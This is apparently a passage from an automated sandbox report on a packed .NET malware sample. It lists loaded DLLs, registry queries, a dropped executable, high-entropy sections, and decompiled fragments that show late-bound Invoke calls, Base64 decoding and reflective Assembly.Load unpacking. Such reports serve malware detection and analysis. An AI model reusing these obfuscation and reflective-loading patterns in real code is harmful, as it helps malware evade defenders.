                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dll
                Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dll
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\yt7dW9nyJK.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: yt7dW9nyJK.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: yt7dW9nyJK.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: WINLOA~1.PDBwinload_prod.pdb source: cmd.exe, 0000000E.00000003.2282783311.0000000002B85000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: WINLOA~1.PDBwinload_prod.pdbCD9E3BB-4D03-46BD-8615-75A902267162.logg6 source: cmd.exe, 0000000E.00000003.2282783311.0000000002B85000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: winload_prod.pdbWINLOA~1.PDB source: cmd.exe, 0000000E.00000003.2282653067.0000000002BA6000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains method to dynamically call methods (often used by packers)
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{BwJEKsS06RmKRGpqyxrZIan6rXJJf6njIgAlOazFdYIjLz3mDRjfW057yJ9YhRZyQYt31Tu2s4W68CBjwyVkqzNYA.JBFr2lxwyEMI0iTiKCjS8fuU5h7XkgR4NDWE26tv4nSIyLd4jRPmVfADJNttFqq3NBBci6xofCpWASDq0tKbRzWlM,BwJEKsS06RmKRGpqyxrZIan6rXJJf6njIgAlOazFdYIjLz3mDRjfW057yJ9YhRZyQYt31Tu2s4W68CBjwyVkqzNYA._6ZDZhICuEhWTGvAxz2jqhE6iu8edJouIX8TWdmqV84k4NuZ9Zc1wlMrlqE0S3NTDlt7372JxyiaYj91L2oRihgjzI,BwJEKsS06RmKRGpqyxrZIan6rXJJf6njIgAlOazFdYIjLz3mDRjfW057yJ9YhRZyQYt31Tu2s4W68CBjwyVkqzNYA.cfQeVGHxJGqmYUT8INMLBymqCiFn0OCqGiZ6U1KJxNzzSLwuZLzvJe95MnI8n1z3x77QbeEcrTVfFG7HCzUr4JuNv,BwJEKsS06RmKRGpqyxrZIan6rXJJf6njIgAlOazFdYIjLz3mDRjfW057yJ9YhRZyQYt31Tu2s4W68CBjwyVkqzNYA.MsVRzXdvg0dbfswZounVL1RrjGkZ2Uv5mSsgYbtEjs6KqKILpwZLeuNYOC3o3fYezgaAaU0S34yGGZK98ku6oAHj8,I04X8xDLq2CNC4Xt.dqijtBKsHhfTMqRq()}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{a6UpppHNRxSOwFcgWTFypIQJzokDR7B[2],I04X8xDLq2CNC4Xt.dLHwxyAABRab2QoULqz8D6POvvahfDr50ToECWJW3lzSFx1Gz(Convert.FromBase64String(a6UpppHNRxSOwFcgWTFypIQJzokDR7B[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { a6UpppHNRxSOwFcgWTFypIQJzokDR7B[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{BwJEKsS06RmKRGpqyxrZIan6rXJJf6njIgAlOazFdYIjLz3mDRjfW057yJ9YhRZyQYt31Tu2s4W68CBjwyVkqzNYA.JBFr2lxwyEMI0iTiKCjS8fuU5h7XkgR4NDWE26tv4nSIyLd4jRPmVfADJNttFqq3NBBci6xofCpWASDq0tKbRzWlM,BwJEKsS06RmKRGpqyxrZIan6rXJJf6njIgAlOazFdYIjLz3mDRjfW057yJ9YhRZyQYt31Tu2s4W68CBjwyVkqzNYA._6ZDZhICuEhWTGvAxz2jqhE6iu8edJouIX8TWdmqV84k4NuZ9Zc1wlMrlqE0S3NTDlt7372JxyiaYj91L2oRihgjzI,BwJEKsS06RmKRGpqyxrZIan6rXJJf6njIgAlOazFdYIjLz3mDRjfW057yJ9YhRZyQYt31Tu2s4W68CBjwyVkqzNYA.cfQeVGHxJGqmYUT8INMLBymqCiFn0OCqGiZ6U1KJxNzzSLwuZLzvJe95MnI8n1z3x77QbeEcrTVfFG7HCzUr4JuNv,BwJEKsS06RmKRGpqyxrZIan6rXJJf6njIgAlOazFdYIjLz3mDRjfW057yJ9YhRZyQYt31Tu2s4W68CBjwyVkqzNYA.MsVRzXdvg0dbfswZounVL1RrjGkZ2Uv5mSsgYbtEjs6KqKILpwZLeuNYOC3o3fYezgaAaU0S34yGGZK98ku6oAHj8,I04X8xDLq2CNC4Xt.dqijtBKsHhfTMqRq()}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{a6UpppHNRxSOwFcgWTFypIQJzokDR7B[2],I04X8xDLq2CNC4Xt.dLHwxyAABRab2QoULqz8D6POvvahfDr50ToECWJW3lzSFx1Gz(Convert.FromBase64String(a6UpppHNRxSOwFcgWTFypIQJzokDR7B[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { a6UpppHNRxSOwFcgWTFypIQJzokDR7B[2] }}, (string[])null, (Type[])null, (bool[])null, true)
                .NET source code contains potential unpacker
                Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, l34GXL5vNW82bgMJ5l.cs.Net Code: aa6VrBLE1I System.Reflection.Assembly.Load(byte[])
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs.Net Code: wkAIiThNH8epac4Ok3Gy0sk1E1UyokG System.AppDomain.Load(byte[])
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs.Net Code: m3CkXr9hliE2mWQYjvZHmsS2mpGT0y9 System.AppDomain.Load(byte[])
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs.Net Code: m3CkXr9hliE2mWQYjvZHmsS2mpGT0y9
                Source: 0.2.yt7dW9nyJK.exe.37cbd40.2.raw.unpack, l34GXL5vNW82bgMJ5l.cs.Net Code: aa6VrBLE1I System.Reflection.Assembly.Load(byte[])
                Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs.Net Code: wkAIiThNH8epac4Ok3Gy0sk1E1UyokG System.AppDomain.Load(byte[])
                Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs.Net Code: m3CkXr9hliE2mWQYjvZHmsS2mpGT0y9 System.AppDomain.Load(byte[])
                Source: 0.2.yt7dW9nyJK.exe.261d0c0.0.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.cs.Net Code: m3CkXr9hliE2mWQYjvZHmsS2mpGT0y9
                Source: 0.2.yt7dW9nyJK.exe.4c90000.4.raw.unpack, Qq.cs.Net Code: Md System.Reflection.Assembly.Load(byte[])
                Source: 0.2.yt7dW9nyJK.exe.3821160.3.raw.unpack, l34GXL5vNW82bgMJ5l.cs.Net Code: aa6VrBLE1I System.Reflection.Assembly.Load(byte[])
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_033A6338 push eax; ret 6_2_033A6341
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_033A3AB8 push ebx; retf 6_2_033A3ADA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_02EF634C push eax; ret 8_2_02EF6351
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_02EF15CD push ebx; ret 8_2_02EF15DA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_087B7808 push eax; retf 8_2_087B7809
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeCode function: 11_2_04CA30EB push es; retf 11_2_04CA30F2
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeCode function: 11_2_04CA30E7 push es; retf 11_2_04CA30EA
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeCode function: 11_2_04CA3031 push es; retf 11_2_04CA3032
                Source: C:\Users\user\AppData\Local\Temp\ffmaba.exeCode function: 11_2_04CA9290 push esp; retf 11_2_04CA9291
                Source: yt7dW9nyJK.exeStatic PE information: section name: .text entropy: 7.980169660583914
                Source: ffmaba.exe.4.drStatic PE information: section name: .text entropy: 7.9803968726190435
                Source: ffmaba.exe.11.drStatic PE information: section name: .text entropy: 7.9803968726190435
                Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, MoLs8m78ESt4YD6gORW.csHigh entropy of concatenated method names: 'PX12BvorUO', 'C4o2JnRMQh', 'r2L2r7xD58', 'toN2fC5Wen', 'YMg2yltSHY', 's1P2gc5u0a', 'PWX2Qp3X1W', 'LWj2win8h0', 'o2K2FopRZZ', 'h6t2mTw3Y4'
                Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, FNiqGIzN6YouuO6eE2.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Bdy2WxTA4N', 'BMG2N8BmFA', 'p7v24wIujM', 'A202E0YrFb', 'LIi2Uka6SE', 'c1A22ykXVi', 'G202PAVMZa'
                Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, LjKFJcGnQbFpADmDEj.csHigh entropy of concatenated method names: 'km2WwQ70in', 'y6xWFdr0d8', 'aoDW0AmBUt', 'SLBWeXlsfN', 'RaMWRNdhd2', 'eBWWO26XOQ', 'DZnW3ueKDe', 'Jg9WIFHQLi', 'Q1gW9oB2HQ', 'FyUWn6yR51'
                Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, h82OGR39MMrSWBIeuA.csHigh entropy of concatenated method names: 'aQCYodnlRF', 'QcKYuyexsS', 'v5bYjPCIvt', 'ofQjpcyWju', 'y63jzfsrE2', 'kkTY8hPSeq', 'sguY7BnRpi', 'jGvYqKWso0', 'clHYTi8Zkj', 'iNTYVb7tjV'
                Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, l34GXL5vNW82bgMJ5l.csHigh entropy of concatenated method names: 'UF1TLxvbsG', 'oysTolclHI', 'BciTa0ISyD', 'gMaTu3KLgD', 'CxLTC6iOoQ', 'HYwTjIQnLJ', 'Ta4TYGZ5Bn', 'CXdT5eNhSg', 'e1wTA0Rfac', 'JKuT1oA9rK'
                Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, NbgqbDZfxTd3FhSpvT.csHigh entropy of concatenated method names: 'yLRE1UCvOh', 'ECiEllMjFP', 'ToString', 'O1dEoTsDIF', 'xxrEaCxlNA', 'l7PEu4kxqH', 'cM9ECgX277', 'rhpEjaqCbr', 'CiQEYKc9Hv', 'CHmE5HyWOL'
                Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, zdH4f3pZmi7p2yCYxr.csHigh entropy of concatenated method names: 'GMS27pPDVk', 'W9S2T6QG6J', 'W4Y2VIGNsX', 'mcA2o6EFWh', 'kLt2aiSiRV', 's6b2CfKRSP', 'sIC2jWDSn5', 'ds6UbPmWGq', 'ntYUt3svsJ', 'PsQUxceNFm'
                Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, oXGlh9FSyLkQpmpfLu.csHigh entropy of concatenated method names: 'MTCufcZTvO', 'NLsugyf3Eg', 'GuvuwFipOO', 'GrIuF13IR0', 'wG2uNw11e8', 'ouou4YmcdU', 'nOluEX9uIq', 'F4quUKVEoE', 'GE0u22hFAC', 'cXauPjbimg'
                Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, olC9lOqWPHK88HFMTE.csHigh entropy of concatenated method names: 'YJ9ragJM3', 'anbfEj16D', 'zOlgfviRF', 'rqlQEadjb', 'cVGF9J5p7', 'y1cm5DtEO', 'g0rVuWbOsq7VjDtaMV', 'qtv2YGJBDSBaQby2wS', 'AEtUabICU', 'sRFP2SGhQ'
                Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, dsMWdeSqEmuJJIBpLr.csHigh entropy of concatenated method names: 'CG0YBu00KD', 'zklYJyL38P', 'KQ6YrL2JU1', 'fITYfrhZoZ', 'TtXYyIIJMn', 'BSiYggur3S', 'lQMYQGlSbT', 'ed3YwddFDb', 'tSuYFECl2w', 'JfnYm7ycax'
                Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, uU2UPPwPJLQsRsHPyp.csHigh entropy of concatenated method names: 'K8bakFXkKZ', 'aHZadickmp', 'F4aaMf64eX', 'BhIaZk8UTC', 'ibwahgO6O0', 'JLJasXs2PT', 'SeKabawUaj', 'wQBatoCFQq', 'UbBaxeEIXK', 'ewqapcLkl4'
                Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, nKKY7Tt52faTCddFBg.csHigh entropy of concatenated method names: 'SBSUo1KaLl', 'JE4UaZaCdk', 'pHRUuVjdHy', 'Y9QUCR08uL', 'k0XUjatQUA', 'z1BUYn0NLC', 'hdeU5tSjgW', 'c84UAqCl8X', 'Oa8U1SNUH9', 'VN8UloAy0X'
                Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, JMKYPcVyVq6QH7wK0M.csHigh entropy of concatenated method names: 'AwK7YU2UPP', 'sJL75QsRsH', 'NSy71LkQpm', 'YfL7luvQhm', 'DW47N7VHoO', 'lA874rKYot', 'DykncXe1DPyJNrZiSR', 'RtCXchC4o1b5pCmxSd', 'dES77nfkCG', 'CQc7TMUTS0'
                Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, vQhmVZmG0JZtewW47V.csHigh entropy of concatenated method names: 'PBHCyScG2K', 'JkJCQwxVgH', 'Pu3uXEEA6t', 'TcQuRNvpPU', 'HOTuOoMn6N', 'JPluHiqT6D', 'fG8u35ZDOj', 'wM1uItaaPe', 'EBvuSXEuTi', 'onHu99LD9d'
                Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, wShyhrkNG0qWJND3Sv.csHigh entropy of concatenated method names: 'lnMN9CUUus', 'nTBNiSvUGg', 'jlWNkM5fGF', 'QsENdIWUnL', 'OdtNevoXJb', 'YcbNX7aqsq', 'Kw7NRMGqP5', 'KO1NOeGo6v', 'C4vNHmaiky', 'SkuN3wGLFh'
                Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, G3L0NIMHLFjsoLjt29.csHigh entropy of concatenated method names: 'ToString', 'pSJ4naaqUe', 'GvO4eiBVS5', 'yiQ4XEVtpL', 'D7y4R3S8HV', 'GtW4OCnx3H', 'PEx4HJ37AP', 'WU343KoRJs', 'OsW4IFdY78', 'YE14Slpm0l'
                Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, KoO1A80rKYoteG0Jem.csHigh entropy of concatenated method names: 'D6JjLOwBIV', 'sRQjaXeeFx', 'frsjCDARpR', 'Tj9jYDhiqR', 'gLFj5U9Zfv', 'xoIChs4tMH', 'HcHCsU1kvt', 'bT0Cb00YIx', 'CehCtdLHex', 'cXwCx2dAnj'
                Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, wqc7bO7TnM3ZX08JehS.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zjYPkP66Zs', 'm0EPdc6DZB', 'm5IPMN4xnB', 'MRxPZOTs7K', 'zrhPhcLC67', 'ItsPsfhAoc', 'Y6mPba9wcO'
                Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, nlGFpdxwrdyqFjguXl.csHigh entropy of concatenated method names: 'zlVU0MQN0c', 'x3BUepLnuX', 'amtUX2mlr8', 'HwaURh0qSQ', 'SnBUkcCZQp', 'gy2UOSaxAg', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.yt7dW9nyJK.exe.4f70000.6.raw.unpack, AdPDqvax914xQbRvHH.csHigh entropy of concatenated method names: 'Dispose', 'JGk7xaFTe6', 'HRNqemSJwU', 'UnZRRN7Sk1', 'dlK7pKY7T5', 'sfa7zTCddF', 'ProcessDialogKey', 'xgWq8lGFpd', 'Drdq7yqFjg', 'hXlqqrdH4f'
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, asEp2FfC6uaqQkU7N03Xi7aMe7aH4UsqyvczX1pV8VNDEBWL6.csHigh entropy of concatenated method names: 'j9pYh7fqUtxAzfvnbuJUiOYCEky35MZza4ejy2YYNk96bR44B', 'q1AkQ9L5Ua31gmqDu5aPF3y22uEixfb6ZlGjhoexTZd0qLmZh', 'XXD17AbScLYXpeQx98rahzkAsurbeSScr7tDFtieaoG0hQF5K', 'KL3JvinUZD63lB8cBE5fll4PbD', 'hYodKkMjQwXPC9IRhVwgMwm9D5', 'M56aYRhAnyH1lN7hW7LmazOpIC', 'xtOX9br7PfuNPsxA9oqCuKteVy', 'SSi8CSEb2hT4pPBGrikeSsnWAQ', 'zHefGITeBicsks60NE9F5AYnfi', 'qldqlcyo8chVirjGfIBaIl2z2k'
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, BwJEKsS06RmKRGpqyxrZIan6rXJJf6njIgAlOazFdYIjLz3mDRjfW057yJ9YhRZyQYt31Tu2s4W68CBjwyVkqzNYA.csHigh entropy of concatenated method names: 'ieoX6VrIxwtQ0f6IPxj01vCOfctxZ5l6ZE0NvjtWknPtwpRYdYVzrRYWzPIGg8WIpwMdndemoXhCbI312', '_38BK1I5SoyOeEOjEuO7IxVars2OjcCgHsEjdqW3FfcNI2nSdSoA6Ny145ZLv2Y3QgnwJUsVZr65zqEbwl', '_86Z1aL9PQfmCZRDJ4oCkARjvaFgfIzRELcAJ1Nc2Iya8HtkxUzVCRA51ZAwGkCudIKGTEzLPQ8p5E1aJL', 'Mps3WRSJwGfNLmVfvSnuZNM6KiMx9FTS0JuyrnTow0MedbgjopKaGEuXs8Qd6ua0ITPnSn0i4FjTd2utM'
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, RHrnabkqggf8x5IBqT2LD4ylWiCt2ceO1BQW7adWJ6d509VvOr5xQjaZtlyl9w24v2t1BcynkEhMKVNrepe12LKHR.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'AmkRhiq4pVi2iBvBtP2Bwybsvw65KyK3nCe2860OnGUeTrID2BvBcIVUop8t2pCQvdZOFbzoqsT8FrjSv', 'nJI63nP0qabprjzbDKLQTo24cK9H5b9buvOuCJHijpfhJxmY3YhhQJN2VvGF49INiiJZJkXYitl4O0M8f', '_8srhG0pKEeotPLJFpLjfJZfJIBLhT6CIGM5JqaWtOsFmkiSNqU3ceC9ZHGaCZxsYf5CHU5wwo5s5AElzL', '_6SZXnXIgpwUuaKA1cu8jnBIxvt2YcOEh500Uas57Q5zd2UXkdXEZZatZP9tV5tPpLuTtJNujdJ8bTSYhR'
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, TObVbKys0GgFW4VOqJ2ZBssSxFQuDu4.csHigh entropy of concatenated method names: 'qUJlaYtxtF3DbhjY', '_99flffu2gimXsrEvebANqrnCeLyGXDPlUR2jFNroY7z0SkWIpjEoL9v1wLRRFYStaERNXiDzM7KYmJrepx36sjnte70k7yL9GR', 'HOwVothBZbpt3MhCNzc7vZd4HU9mMZAhgshlneBdv2h5ZbK9DFVm3a2qSrciZ0OwL8Oot59rmHBc6yFuLEOTTygwL43snDyxD6', 'YlFRwAvV4R41VmGHmOT32RhVbtjp7b27d3dxRiFkqlcbCluFZexiefjrnsuljXYiTSB9yEbjVHaDopCdVjsydlt8udD1Sk5pmK', 'jcnMb4QQhDa5eCURI8L9eKMDayfrk94eDSxDyXY75Sxcgu1P5dwYXn8DvDfYnXcmvhNdVZSEprhGsDr7cLdf0KQEFyVB0nTWYy'
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, FNmlZ2aTo37rTj5achFuQvwVWWjwciW.csHigh entropy of concatenated method names: 'bE6Skcym1E8q1JpQvrrx3A2mPNyEYmA', '_48a39vrGguHmHwaVwCYAXZzl4LFopMc', 'KCB2eIA3VC5QdcTQ7vcWdKgaQ7sBGeN', 'sfRlsl7nZqZfuf0SM1QN7yUx75H53Rh', 'XqXnqcxyHckdUfZccMZiGWEtvihJFaC', 'CumF6z080eUonkPpjiEt8hXsb7DITXb', 'n1xP1ZOmmaiWJwC1ugklwqoJ9HSjjAZ', 'kwM3uET4iWbN6eslWcLIYG7tJxzzeK0', 'Xff0w9u7Bfzj323rrg1udqMDCrc859R', 'Hv0sdAhGuJ7WgE8AEe4vW19hUFftosp'
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, I04X8xDLq2CNC4Xt.csHigh entropy of concatenated method names: 'L5f6jbsrgh8yYymy', 'ggsKYphZwRQlM9am', 'Ph8AevJTp2T7ku20', 'IZCHUE2BDP769cUK', '_30rMMePn4gqbT3MH', '_6HZ8rTmwlKI6LdOE', 'r6MU5kcfW4EjU7lv', 'dCKW9WrLdnh9EaZV', 'cCVgQOQCfSUo347X', '_46XjgzRDLUSXjJjo'
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, 46Vktqg7CAqVoJ3pXlNy6niu94YrpPriQQA765ga1y8jmqBJ9nrC0PNeoqVxX5rB8GTaZOIbxholzAhW49uLNc62H.csHigh entropy of concatenated method names: 'QS5snepBdQqcCOHSQp7wjYIBy9LdLD9JeyjCxuIbYWVwJ8jOguYWzcEYOC4LkBruRMAZhszhYztkH84KxhUkBmDzV', '_8VMPhDzpud4K0D4TquEusHJXknWPp7fke5kLaX1wtC0z6RrzbmqhggU9TgpCzBalnWms12hoRs1GdRw6jJwpKDU0Q', 'YBwBC1vWAUZiHjfk8nlWB5TcSRA3oPClfq6cPLrfFkoZD0CwZLN6fcGYrg2DOmIWL8fXIbXVLEWwreT4mJumY5zT7', 'zSUF79XylEJaKsEdJqtLmyb0MSbrsRFB8XsPazAu1IuUs2ZXHZkJGI31Vr4YG4yWGX1UfDD2SFJAv7sVINYQS9IW4', 'nqyYJVzhH9i1KcWmyuaLVZXlO6uZcbtvsbE9b2Y0AKTbQisK6v8LvtwrKfkcKfpCz3z567Dtj9DC5UsxsdkEN6ava', 'dCvu9PJyf7MfVS1Npc3fjhG4LSnT13v7ZN2PeUNDI9POEyjyIRUvYcaF3ABpvbu33ocVz90ihZhBEfF5BN74LMJSJ', 'JT9wDkQa6v6BdWcpbWa9WMRL3vomRHBYI0vfMhCmDg6lI1Ww2tVtA3m7AzfQA8flQbppxXKI3INXriEyYsqCUqVSq', 'SqFODOrdzvoFFQEH3vzqJpRU1o5IAywpH5Vy0K3IWfcxtEZpgEmkrLtqIsjRSB9QFq7ByCwUKbdO9S9hhRn7HeYHX', 'pGosDhHzyNeePTKPyTwr9m1xQ7KPu7GqfgyuwDSXCMZXF9hdeckF9CRPraIcI2VjcsGqlCzItThdntkZfUi85xgYx', 'KVcOKWHq70Jo70xfPEvBXDyLWzeapKnSm6ZqpwSQo4jmCd3aG92qkTHeMx612ghHxliNVcFiSakEsgUs2CX9VXuqS'
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, IklJR9Egrci7AkoDGmrtlQz9KpfApOw.csHigh entropy of concatenated method names: 'Poc96CYK8OSv52z26hmXZfOp7tWv8TF', 'ExuBL3pMYZSl9913WmNbxDZhYMOjBN6', 'ecPnLK2QepjkslfNCNM1nmU9Zaz6qQu', 'rOn9thVJbMyWyrQ7urXne23OOfLKV2DnfdDEKYSs33EFmusn9TAHdExLeOqe0WnzQ0W3yUxX3hlrORKwlSbnSbxfYxFny93zD2', 'n1Kt8jjnVKwMzP4XvhIWNdjNoiHo380FoO5AfnzYBQsb2S5BSVVwbEgpADjXymXkk2K5MFA1JwtoQOkD2maMetNhc4ey4z0sra', 'bNvU1zkRVYVglK41nyb6EyKDl0mRGa5rSs56jXXGb5FkVeHpLeAaWAX3uXAbHPkPKIXiAkmCO5YJNWmTBPOmEEmQvsRvVEAT3J', 'EaUqAvoIBKIqK7lROQeEZKTApSVnfkl3jzK0Gs3HoXgVMEZssVglXUsgK8TOUzDwElRPPqWHnWsQlL2JNoOtI4Oo16AdBQ5lPa', 'GWSgsyBxh2AdxW4HIL87cGlfJCD1VRlsSaUSET9aSS7BZJXNTWSzviaSJHzSRN2HATJlo9RkRUlsrN32NWN0oocgt12kBeBEIN', 'dQojCAMlnWTBRn4ep59rv6Yy8JDR8lKfOz8mGgStmHyugnuDELiXXOy98H1uqD69PCfzjXK5L7IvLA9RXX6r9f4YruF6Ylwfgc', '_9Q0ogs17qwzhJbUyXr16HTr3BRGn4QvnoHycknKeIUDOFNZVnxlnQr5ljgSNWmkKwKTVjpEqIiDYjAKNpdwaApjPDu4jGxpZL5'
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, L3z0ChbTyvwnAns5piBaj1Ep4MZJixT.csHigh entropy of concatenated method names: 'f6umHbcSKUEeCW91ooOAfJl9PjsmMaH', 'wkAIiThNH8epac4Ok3Gy0sk1E1UyokG', 'mJQi8aQlYBH680bsbDAcLkSWUticyzq', 'YDaJPmh0IV3zBUCXDBCT901fLwqEdOm', '_5MZAwH4gj3KSlo2yJJoL5thDudhywuf', 'gha1t9V6cwzsPueRtGncNgrVjVWduZI', 'RmzNMxHPsPlMoCYGw4xljeH3pUmG1D1', 'vKORDnbaXqyihIjqVcVn6FuJuirt36x', 'e0socU8SbuUz6ZcaJsyGEJcP8BpPuea', '_9kxN9kzg5bQyCJ2LwwMR8FggoKWuSzf'
                Source: 0.2.yt7dW9nyJK.exe.26309a0.1.raw.unpack, rlPW4lL6JzpBKG5uTpUgtMKAdxQudep.csHigh entropy of concatenated method names: 'kBIJXv5a6rottIG83i4vMNxD8FeQAsJ', 'UXPzojRBKx1Oqz9xM4hqjeBMRGFhilZb0DpPekrUZrUFBwX4Z6QKRfIR8Q6VLG5yCxn4FdHJAk7DF12DySdVEngK8AbS6420Ua', 'N93RaNm3kVfs5sBwuxwa1snrEURzE4gpyKg3PFeRmsWQ9grkjjjD6u8KC4NOAbTgcEFuj1CrJWLrxbiBtYbrDDtY1SSUUupQr9', 'XGroXQIR91D3l4CCUv1lCuJWuRjTdcWOzPqUdCqRyHMdqmHUR0ueHXMI2rBwVL1VXstJIcfgV1hQJu7FIn7U6ueRyPjsNM3EI2', 'BqnIh4cGt3g5rOqBfzaULbx9adX0obHUPSD6WWd285Qc4G9Lax9PXlcBSFQtHOvaF5dDdTN9DNl6QLUPu8fh16LhQmfiOzzPBt'
